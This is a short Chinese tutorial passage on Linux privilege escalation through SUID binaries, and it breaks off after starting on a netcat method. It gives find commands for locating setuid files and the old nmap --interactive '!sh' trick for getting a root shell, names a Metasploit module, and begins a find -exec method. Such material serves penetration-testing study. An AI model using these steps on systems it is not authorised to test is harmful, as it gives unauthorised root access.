通过SUID提升权限

Linux提权中，可以用的SUID文件来提权，SUID的作用就是：让本来没有相应权限的用户运行这个程序时，可以访问没有权限访问的资源。通常可以使用一下命令来找有SUID标志位的文件：123find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;例如nmap12ls -l /usr/bin/nmap-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap存在s 则表示其存在SUID标志位，并拥有root的执行权限。以下是几类可用于提权的文件总结：1.Nmap老版本的nmap（2.02-5.21）有 interactive，是允许用户执行系统命令的。提权方式1nmap --interactive之后执行命令：123nmap> !shsh-3.2# whoamirootmsf中的模块为：1exploit/unix/local/setuid_nmap2.Find12touch testfind test -exec whoami \;如果服务器上装了nc ………………………………